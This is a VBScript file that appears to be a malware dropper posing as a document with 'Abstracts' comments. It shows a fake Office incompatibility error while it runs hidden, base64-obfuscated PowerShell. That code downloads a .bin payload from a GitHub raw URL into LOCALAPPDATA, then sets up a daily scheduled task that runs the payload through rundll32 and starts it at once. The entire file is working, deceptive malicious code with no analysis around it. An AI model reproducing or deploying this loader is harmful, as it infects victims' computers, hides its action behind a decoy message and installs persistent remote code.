' 
' 
' Abstracts:
' 
' 
' 
Set HOMEPATHS = CreateObject("WScript.Shell")
call HOMEPATHS.PoPup ("The format of this document is not compatible with the version of Office that you are running. Check your computer's system information to see if you need an x86 (32-bit) or x64 (64-bit) version of this file.", -1, "Error", 16)
Set EnvVar = HOMEPATHS.Environment("PROCESS")
EnvVar("HOMEPATH") = "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLVR5cGUgLVR5cGVEZWZpbml0aW9uIEAiDQogIHVzaW5nIFN5c3RlbTsgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOw0KICBwdWJsaWMgc3RhdGljIGNsYXNzIFVSTE1PTnsgW0RsbEltcG9ydCgidXJsbW9uLmRsbCIsIENoYXJTZXQ9Q2hhclNldC5BdXRvKV0gcHVibGljIHN0YXRpYyBleHRlcm4gYm9vbCBVUkxEb3dubG9hZFRvRmlsZVcoIEludFB0ciBwQ2FsbGVyLCBTdHJpbmcgc3pVUkwsIFN0cmluZyBzekZpbGVOYW1lLCBpbnQgZHdSZXNlcnZlZCwgSW50UHRyIGxwZm5DQik7fQ0KIkANCiQ2MzBCXzAgPSJodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vbGVhY2hpbTcvaGVsbG8td29ybGQvbWFpbi92LzY1MC5iaW4iOw0KJDYzMEJfMSA9ICRlbnY6TE9DQUxBUFBEQVRBKyJcc2xlZXBpbmdsb3R1cyINCiQ2MzBCXzIgPSAkNjMwQl8xKydcODE5Mi5iaW4nOw0KTmV3LUl0ZW0gLUl0ZW1UeXBlIERpcmVjdG9yeSAtRm9yY2UgLVBhdGggJDYzMEJfMQ0KJG51bGw9W1VSTE1PTl06OlVSTERvd25sb2FkVG9GaWxlVygwLCAkNjMwQl8wLCAkNjMwQl8yLCAwLCAwKTsNCg0KJDYzMEJfMyA9ICQ2MzBCXzEgKyAnXDgxOTIuYmluLCBpbml0Jw0KJiBjbWQgL2MgU2NoVGFza3MuZXhlIC9DcmVhdGUgL1NDIERBSUxZIC9UTiAie2ZiOGRmNjg4Yi00MWI4ZGZhaGo5LTUxYzE1Ni1hOTkwMWItMjEzNDYwfSIgL1NUIDAwOjMwIC9kdSAyNDowMCAvUkkgMjQwIC9GIC9UUiAicnVuZGxsMzIuZXhlICQ2MzBCXzMiDQokbnVsbD1TdGFydC1TY2hlZHVsZWRUYXNrIC1UYXNrTmFtZSAie2ZiOGRmNjg4Yi00MWI4ZGZhaGo5LTUxYzE1Ni1hOTkwMWItMjEzNDYwfSI7'))"
call HOMEPATHS.Run("powershell.exe ""$env:HOMEPATH|iex|iex""",0,0)
' 
' 
' Abstracts:
' 
' 
' 
